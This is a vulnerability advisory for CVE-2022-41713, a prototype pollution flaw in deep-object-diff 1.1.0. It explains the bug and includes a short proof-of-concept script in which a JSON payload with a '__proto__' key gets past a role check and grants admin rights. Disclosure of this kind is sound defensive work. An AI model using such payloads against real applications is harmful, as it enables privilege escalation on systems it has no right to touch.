deep-object-diff 1.1.0 - Prototype Pollution

Summary


Name	deep-object-diff 1.1.0 - Prototype Pollution
Code name	Heldens
Product	deep-object-diff
Affected versions	Version 1.1.0
State	Public
Release date	2022-11-15

Vulnerability


Kind	Prototype Pollution
Rule	390. Prototype Pollution
Remote	Yes
CVSSv3.1 Vector	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSSv3.1 Base Score	7.3
Exploit available	Yes
CVE ID(s)	CVE-2022-41713

Description

Version 1.1.0 of deep-object-diff allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.

Vulnerability

Prototype pollution is a vulnerability that affects JS. It occurs when a third party manages to modify the __proto__ of an object. JavaScript first checks if such a method/attribute exists in the object. If so, then it calls it. If not, it looks in the object's prototype. If the method/attribute is also not in the object's prototype, then the property is said to be undefined.

Therefore, if an attacker succeeds in injecting the __proto__ property into an object, he will succeed in injecting or editing its properties.

Exploitation

exploit.js

import { diff, addedDiff, deletedDiff, updatedDiff, detailedDiff } from 'deep-object-diff'; let admin = {name: "admin", role:"admin"}; let user = {role:"user"}; let normal_user_request = JSON.parse('{"name":"user","role":"admin"}'); let malicious_user_request = JSON.parse('{"name":"user","__proto__":{"role":"admin"}}'); const create_user = (new_user) => {
    // A user cannot alter his role. This way we prevent privilege escalations.
    if(new_user?.role && new_user?.role.toLowerCase() === "admin") {
        throw "Unauthorized Action";
    }
    user = addedDiff(user, new_user);
    console.log(user?.role);
}

try {
    create_user(normal_user_request);
} catch (error) {
    console.log(error);
}
finally {
    create_user(malicious_user_request);
}